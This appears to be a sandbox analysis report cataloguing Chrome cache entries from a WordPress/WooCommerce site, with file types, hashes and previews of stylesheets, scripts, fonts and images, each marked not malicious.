                                                                        Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100

                                                                        Chrome Cache Entry: 303

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (12602), with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):59050
                                                                        Entropy (8bit):5.351406715924575
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9CEB5C2236A9BC287BEB3A6BCFA7026D
                                                                        SHA1:DA7A269F8932BDFB4C52911F39AABC861BE0EF41
                                                                        SHA-256:ABE4E0480D9AD8ABB77CA74300C5B631A143CBBE942B6D19A633D3109BB86A96
                                                                        SHA-512:C748FBE003FA72A77809233B884D809AE07706BDA765E6321EB90EB6278BB07FF1319BCFC6FD46517DC40512E1E16FBA1B53562B4ECA9E572E94E3B63407E5AB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.5.4
                                                                        Preview:/* FIX FOR WORDPRESS's CRAZY <p> TAG ANOMALY */...rs-p-wp-fix { display: none !important; margin: 0 !important; height: 0px !important; }..../* NEW Z-INDEX FIX*/...wp-block-themepunch-revslider { position: relative }..../* FIX FOR QUICK LOADING OF SLIDER SCRIPTS AND WP-ROCKET READDING IMG TAG INTO DOM*/../*rs-sbg-px rs-sbg-wrap img { display:none !important}*/..../* MODAL BASICS */..rs-modal { position: fixed !important; z-index: 9999999 !important; pointer-events: none !important;}..rs-modal.rs-modal-auto { top: auto;bottom: auto;left: auto; right:auto; }..rs-modal.rs-modal-fullwidth,..rs-modal.rs-modal-fullscreen { top: 0px; left: 0px; width: 100%; height: 100%; }..rs-modal rs-fullwidth-wrap { position: absolute; top: 0px; left: 0px; height: 100%;}..rs-module-wrap.rs-modal { display:none; max-height: 100% !important; overflow: auto !important; pointer-events: auto !important;}..rs-module-wrap.hideallscrollbars.rs-modal { overflow: hidden !important; max-width: 100% !important}..rs-m

                                                                        Chrome Cache Entry: 306

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):10721
                                                                        Entropy (8bit):3.5801354464202984
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5913A02287279FA0C9D4704655687CCB
                                                                        SHA1:3BC0A4E773150BCBEFAC9DE54DF5093F6ED28232
                                                                        SHA-256:F62B2B2019093248189FD8E25491B3F0DEBD49A802984C8E61505B89D533C70C
                                                                        SHA-512:0E3B343D1AD23A38AC96C5CF483D49766CC4D9C97B508843F13AA809859D77B1C75D00BAB551DBAF56A0CE0BFAAA7B4A311FD6DFA43272EDEC03496E87FF85AE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:(function ($) {. /**. * refresh cart when payment method changed. */. if (awdr_params.refresh_order_review == '1') {. $(document).on('change', 'input[name="payment_method"],input[name="billing_city"],input[name="billing_postcode"]', function () {. refreshCart();. });.. /**. * refresh cart when Email changed. */. $(document).on('blur', 'input[name="billing_email"], select#billing_state', function () {. refreshCart();. });. }.. function refreshCart() {. $('body').trigger('update_checkout');. }.. $(document).ready(function ($) {. function init_events() {. if (awdr_params.enable_update_price_with_qty == 'show_dynamically') {. function getWDRDPTarget(form, target, is_variable){. let $price_place = '';. if (form.find(target).length) {. $price_place = form.find(target).first();.

                                                                        Chrome Cache Entry: 307

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65527), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):211622
                                                                        Entropy (8bit):4.92450461420046
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5BDD1E3D788393B1F2CF734E75F6E122
                                                                        SHA1:6EE0EA4EFDC115AA943A1E5A79B5481C37AAF9E7
                                                                        SHA-256:BAB414CB30E397D6805654F58E3E139E5A5283EB8C0C02CC16A4DCA0053D6B11
                                                                        SHA-512:3DD9279519CF0A9EB45760EE97DBA82C6113468F9346D26E4E5914606B77D3800AE104DA1DFAA9A396BA5558846EE961EA99B128FC14238CA00E83ECB197A742
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=7.6.2
                                                                        Preview:.wc-block-link-button{border:0;border-radius:0;margin:0;padding:0;vertical-align:baseline;color:inherit;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-decoration:inherit;text-transform:inherit;box-shadow:none;display:inline;text-shadow:none;text-decoration:underline}.wc-block-link-button,.wc-block-link-button:active,.wc-block-link-button:focus,.wc-block-link-button:hover{background:transparent}.wc-block-suspense-placeholder{outline:0!important;border:0!important;background-color:#ebebeb!important;color:transparent!important;width:100%;border-radius:.25rem;display:block;line-height:1;position:relative!important;overflow:hidden!important;max-width:100%!important;pointer-events:none;box-shadow:none;z-index:1}.wc-block-suspense-placeholder>*{visibility:hidden}.wc-block-suspense-placeholder:after{content:" ";display:block;position:absolute;left:0;right:0;top:0;height:100%;background-repeat:no-repeat;background-ima

                                                                        Chrome Cache Entry: 308

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):26902
                                                                        Entropy (8bit):4.926687428991997
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:411DEB70863F87EBDC4ECE3093B86784
                                                                        SHA1:217825061D7808A9827BD5A69815C5FDA7297516
                                                                        SHA-256:66B4DEA131D6D0C0CDA6F79683EB1CC9D0E19B967F36CB1B42118F7B0F6AC742
                                                                        SHA-512:46D70422949758AD1ED845BA767D129A54848748FF21AABA4044D3CC0DE84172C9A577DF1A060EA23253D24AAE8DB8A4FDDD277E1C558F204C4A7FEAF60D84D6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=3.3.0
                                                                        Preview:.woof_container{. padding-bottom: 5px;. margin-bottom: 9px;.}...woof_container select{. width: 100%;.}...woof_container label{. display: inline-block !important;.}..ul.woof_list{. margin: 0 !important;. list-style: none !important;.}..li.woof_list{. list-style: none !important;.}...woof_list li{. list-style: none !important;.}...woof_block_html_items ul{. margin-left: 0 !important;.}...woof_list label{. vertical-align: middle;. padding-top: 4px;. padding-bottom: 4px;. display: inline-block !important;.}...woof_childs_list{. padding: 7px 0 7px 17px !important;. margin: 0 !important;.}../**********************/..woof_auto_show{. position: absolute;. z-index: 1001;. width: 100%;.}...woof_sid_auto_shortcode .woof_container{. width: 33%;. min-width: 150px;.}...woof_sid_auto_shortcode .woof_container,..woof_sid_auto_shortcode .woof_container_mselect{. overflow-x: hidden;. overflow-y: auto;. min-height: fit-content;. max-

                                                                        Chrome Cache Entry: 309

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 3236 x 1388, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):290743
                                                                        Entropy (8bit):7.6308360121194045
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:344F848B4771CC3DF184A8D80F5C906B
                                                                        SHA1:ED2E3113E4DC7DC1D9DDDC88E3E59BF7CCE43C79
                                                                        SHA-256:42F18066C7F58967E6D8E398AD6780CDB2AE701533B76C3D73068194E1E07D63
                                                                        SHA-512:46AC835C92581A15707BEBB13C902E9874FD4FFE6BF5B2EF10EEC404EEEFCD15894909FE664856199D18886FBAEFC66B52BD8FEC3CB84CEAA13D445ED4901754
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR.......l......,......sRGB.........eXIfMM.*.............................J...........R.(...........i.........Z.......,.......,.........................................l....!.......pHYs...#...#.x.?v...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^....@.IDATx...i.|...NF........4.ZR..zU.3.a....Lb0.....qb.&6d.{H q^$/...E...1~...@bBL`<...].-../.e...q..>u~....<U.SU...S..{.9.sO...s........ @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......

                                                                        Chrome Cache Entry: 312

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):18536
                                                                        Entropy (8bit):7.986571198050597
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8EFF0B8045FD1959E117F85654AE7770
                                                                        SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                                        SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                                        SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                        Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T

                                                                        Chrome Cache Entry: 313

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (14615), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):14615
                                                                        Entropy (8bit):4.664430727671477
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7A162CA35A696BA5D54949E3C7C43887
                                                                        SHA1:9E6879C53CF32F8F00CCA038989A01A22610B915
                                                                        SHA-256:6610CFB284C5370ED1CD73333301A0FD21D0149EFDCD366DD7B8FE35A5949806
                                                                        SHA-512:4E29FDF3FF2F4084A6A3B3542FD3355F4C28206B5815548496953EE941BC21E3FFD22E08362CA2975F2F31AFFFE87AB7B74D7BF8DFB690A424A887E66ACE411A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/select2.css?ver=6.6.1
                                                                        Preview:.select2-container{box-sizing:border-box;display:inline-block;margin:0;position:relative;vertical-align:middle}.select2-container .select2-selection--single{box-sizing:border-box;cursor:pointer;display:block;height:28px;margin:0 0 -4px;-ms-user-select:none;user-select:none;-webkit-user-select:none}.select2-container .select2-selection--single .select2-selection__rendered{display:block;padding-left:8px;padding-right:20px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.select2-container .select2-selection--single .select2-selection__clear{position:relative}.select2-container[dir=rtl] .select2-selection--single .select2-selection__rendered{padding-right:8px;padding-left:20px}.select2-container .select2-selection--multiple{box-sizing:border-box;cursor:pointer;display:block;min-height:32px;-ms-user-select:none;user-select:none;-webkit-user-select:none}.select2-container .select2-selection--multiple .select2-selection__rendered{display:inline-block;overflow:hidden;padding-left:8px

                                                                        Chrome Cache Entry: 314

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):3340
                                                                        Entropy (8bit):4.528023025464945
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:AA872DB78AC1FCFF6FC07934119E7971
                                                                        SHA1:EA2F0148E17C2015CD218EBE0963B011B7177580
                                                                        SHA-256:A5B55ACB8BFE342B6A815A98838145D70F77F4BB0ED9EF2AF93136DE3BD454BC
                                                                        SHA-512:BFDE4CAEA57C782468F647DCCA5D1DDEA191BA11E8E3D769C5B028249C87C41632A0EC5D9FD38A38A75940ED0D6181FDD1FCC6FEEF39F61E510D0089EFE9A321
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver=3.3.0
                                                                        Preview:"use strict";.function woof_init_checkboxes() {. if (icheck_skin != 'none') {.. jQuery('.woof_checkbox_term').iCheck('destroy');.. jQuery('.woof_checkbox_term').iCheck({. checkboxClass: 'icheckbox_' + icheck_skin.skin + '-' + icheck_skin.color,. });... jQuery('.woof_checkbox_term').off('ifChecked');. jQuery('.woof_checkbox_term').on('ifChecked', function (event) {. jQuery(this).attr("checked", true);. jQuery(".woof_select_radio_check input").attr('disabled','disabled');. woof_checkbox_process_data(this, true);. });.. jQuery('.woof_checkbox_term').off('ifUnchecked');. jQuery('.woof_checkbox_term').on('ifUnchecked', function (event) {. jQuery(this).attr("checked", false);. woof_checkbox_process_data(this, false);. });.. //this script should be, because another way wrong way of working if to click on the label. jQuery('.woof_checkbox_label').off

                                                                        Chrome Cache Entry: 317

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (5082)
                                                                        Category:dropped
                                                                        Size (bytes):5125
                                                                        Entropy (8bit):5.463271316022447
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FE22279E3C53818E1349FACDC06D87BE
                                                                        SHA1:5226C06CD30967301E0DE0ECC5FB935B060BD768
                                                                        SHA-256:5B53E811E2F70AAE99B19DDE4E877B98382A294A0727B2C8AB788BA030E858C9
                                                                        SHA-512:9E26F6FFEA34C1BDE51251C344413B529B8E3D020FE4BCE75DF506F5650DA5BE9E763A31D0A10D2CCE1FC05C5A464F1F57920A47E0BF606CF05970653E0863F4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */.(()=>{"use strict";var e,r,_,a={},c={};function __webpack_require__(e){var r=c[e];if(void 0!==r)return r.exports;var _=c[e]={exports:{}};return a[e](_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=a,e=[],__webpack_require__.O=(r,_,a,c)=>{if(!_){var n=1/0;for(u=0;u<e.length;u++){for(var[_,a,c]=e[u],i=!0,t=0;t<_.length;t++)(!1&c||n>=c)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[t])))?_.splice(t--,1):(i=!1,c<n&&(n=c));if(i){e.splice(u--,1);var o=a();void 0!==o&&(r=o)}}return r}c=c||0;for(var u=e.length;u>0&&e[u-1][2]>c;u--)e[u]=e[u-1];e[u]=[_,a,c]},__webpack_require__.f={},__webpack_require__.e=e=>Promise.all(Object.keys(__webpack_require__.f).reduce(((r,_)=>(__webpack_require__.f[_](e,r),r)),[])),__webpack_require__.u=e=>714===e?"code-highlight.28a979661569ddbbf60d.bundle.min.js":721===e?"video-playlist.e85695d7b9171d89c565.bundle.min.js":256===e?"paypal-button.3d0d5af7df85963df32c.bundle.min.js":24

                                                                        Chrome Cache Entry: 318

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3835)
                                                                        Category:dropped
                                                                        Size (bytes):306894
                                                                        Entropy (8bit):5.579397009483042
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B2942669F58BB46B86548601D02CFBBD
                                                                        SHA1:55DA8E9289BB9AFF8423484E87AA19CD0A2253A7
                                                                        SHA-256:3A72BE42A6A023703417B54A16E9F991D1984DEDD637CDD98246EBB063553B33
                                                                        SHA-512:7E69169198B6073094C4A050B8B6B218D8E8A0937A885232E368C27BA4D2F0A6D8977E99B1260085318A96271D4D3F373B5FB96D62EF3C097488724498611EB6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":11,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",

                                                                        Chrome Cache Entry: 319

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (57726)
                                                                        Category:downloaded
                                                                        Size (bytes):57912
                                                                        Entropy (8bit):4.690906492963222
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:EEB705D0BDCCFD645D3BBD46DD1FBAB3
                                                                        SHA1:066DEF290F42ED8C00860E573CC880BD46E9CED4
                                                                        SHA-256:D01A2BA2805C78957E15A2958135DE0F3CB88E95159DD0F6C0A032BD76B1B0E9
                                                                        SHA-512:39D11741808E95D8EA504B2E30AB19463F771EDDB741196121BF04FD7D2C6F066199EF1E530EA0F2AEC077118929A91C05BBFBFBF3D7D067366ED7FB46EF1C64
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3
                                                                        Preview:/*!. * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pu

                                                                        Chrome Cache Entry: 320

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (17785), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):17785
                                                                        Entropy (8bit):4.792312306991425
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:83A833C196DC1815B1BABD0152768E38
                                                                        SHA1:3DDCB05D591E32F6CC2270F3AD2EDD3BE5770AE1
                                                                        SHA-256:17E42B859093F7827A96A2CD7C90394E15D3ABBB1F4FF1F9C131A43519C35CE2
                                                                        SHA-512:955422648F78241C56E460B98CA1FF4FAFD0A18FDE5DA00A59710752E9DC797C8D5FFDB73F556A08FF546FE2EAC02353A36B46EEA6C26A353C10F7C15AA20F41
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/elementor/css/post-8052462589213.css?ver=1733126350
                                                                        Preview:.elementor-8052462589213 .elementor-element.elementor-element-f9676f7 > .elementor-container{min-height:90vh;}.elementor-8052462589213 .elementor-element.elementor-element-f9676f7{margin-top:0px;margin-bottom:0px;}.elementor-8052462589213 .elementor-element.elementor-element-e78299e > .elementor-widget-wrap > .elementor-widget:not(.elementor-widget__width-auto):not(.elementor-widget__width-initial):not(:last-child):not(.elementor-absolute){margin-bottom:0px;}.elementor-8052462589213 .elementor-element.elementor-element-b25c6a2 > .elementor-container{min-height:100vh;}.elementor-8052462589213 .elementor-element.elementor-element-b25c6a2{margin-top:0px;margin-bottom:050px;}.elementor-8052462589213 .elementor-element.elementor-element-92f369e > .elementor-widget-wrap > .elementor-widget:not(.elementor-widget__width-auto):not(.elementor-widget__width-initial):not(:last-child):not(.elementor-absolute){margin-bottom:0px;}.elementor-8052462589213 .elementor-element.elementor-element-5330b71 >

                                                                        Chrome Cache Entry: 321

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):18596
                                                                        Entropy (8bit):7.988788312296589
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C83E4437A53D7F849F9D32DF3D6B68F3
                                                                        SHA1:FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
                                                                        SHA-256:D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
                                                                        SHA-512:C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                        Preview:wOF2......H...........H=................................|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q*.......u*D.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.

                                                                        Chrome Cache Entry: 322

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 1536 x 1536, 8-bit colormap, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):1125730
                                                                        Entropy (8bit):7.961321043547628
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4DB5698C9732EE625411A8694C97A8C6
                                                                        SHA1:703C0594019042358889AF79C7C810ADCB1F4C4A
                                                                        SHA-256:A6F05A4D762F1C305DBE730021279E70F06C52EA6D56975FFB255C1BC6CD1239
                                                                        SHA-512:F1AF789A72F9D4224CBD231FFEB6209FA2B9DD28A0A55966AD62B1541E1B3C020F397FD055C50F77DDE36D4F82CBD193ADE98089D81DD870B3F7D6A1F8BD7CD0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/2024/09/Asset-4@4x-1536x1536.png
                                                                        Preview:.PNG........IHDR..............0sY....pHYs..........+......PLTE............................................................................................................2+0.......$) ........8-2................B8?0),......@5;...<16...D<D* $...(. I?F.......KCKUMU$........$.....XUcPHR...619.......}.(#(...........d`k.cr...T?J..#.$_JT/!"fOYRFL\Zi5&*...VP].......C@L.~r.og*'/...;5;.p..jd-..GER...tu...y.ix....u;*+.ypx_n......[RZ96@nWdL9C..'..0.6....8$".r......a[dmjyKJW.y.no..tm.v.]GKdbr...OO^...R?AA.1~|..c\..|jV^.i{tp{5..aV^..yZe.YS..<;G...nKDifsI<<...y....m}........q]iH2<.yo..................U:4G41....rhE)#......dh}......bB;..........w}....zOJ......}z......\_r.}..ko...........Q0)..qQ[.......`Woim........................................~y...fa.tnb51....zy................................,....tRNS...........A.... .IDATx.[..*...5WB8$$R._K..<.[?..P...w.\-..|.....:U....v.........=j;&.....O...{?..}..^....i_}..i'.F.M.m.w.Gs....~.A..5....MOs.u.....Fv:

                                                                        Chrome Cache Entry: 323

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", progressive, precision 8, 2560x1440, components 3
                                                                        Category:dropped
                                                                        Size (bytes):323612
                                                                        Entropy (8bit):7.973024922328179
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:29EF2A1A2E34039CE56AA4C6469F6655
                                                                        SHA1:CAF3E4C36AE13E3B9F73B40697D4D1019660C4BC
                                                                        SHA-256:261C30323F7676FB0F1523012B9A5B857125FA4D3BD484FAA016042450B28957
                                                                        SHA-512:A4A6D49100E18C58258696D3E634B1D52B95106E528CD399D2FFEF686A4174F962F5B988B156A17E2AB1C9E42ABE0DDB98B993BF6E6D4497F5D8AFD398E4E281
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".............................................................................P.5)...I.H.a...I.V`...4..f....#...]{.....3?.../..W.^..d.`..=.....?..z.KR.z...G....:X..e..;.....^.0A.eU.....^;..98...c.bymW...i.....4........./BXuT.dU.,...R.o5<...<...VU.g...|.{h...<.......-.....OD....W......h.NoJ0.z^...z.w.iNm...............`.................&...b. i. .......................L....q..e6..Qd.2#.L..@.`.J,..1.....$...@........ b.&..............@...... `....C..Q..R.E..b.d>.3..$.......O..y..2.D.l.......=C.Y`,(...N.4y.7S..}....g..N..g.).y+..K...\u...7w.........{.f.u..Rt".\.I\x.=G....W5;3.V.....:.......7....<..Yl..Ue.._..;m$k#.W..?>.._...x.9........!..i..]q.S.o..-g.......]..W...{;k.R..sj..1.h...b`................ .. h....h......b`.........4.0....

                                                                        Chrome Cache Entry: 324

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", progressive, precision 8, 2560x1440, components 3
                                                                        Category:dropped
                                                                        Size (bytes):409772
                                                                        Entropy (8bit):7.9715050160079
                                                                        Encrypted:false
                                                                        SSDEEP:
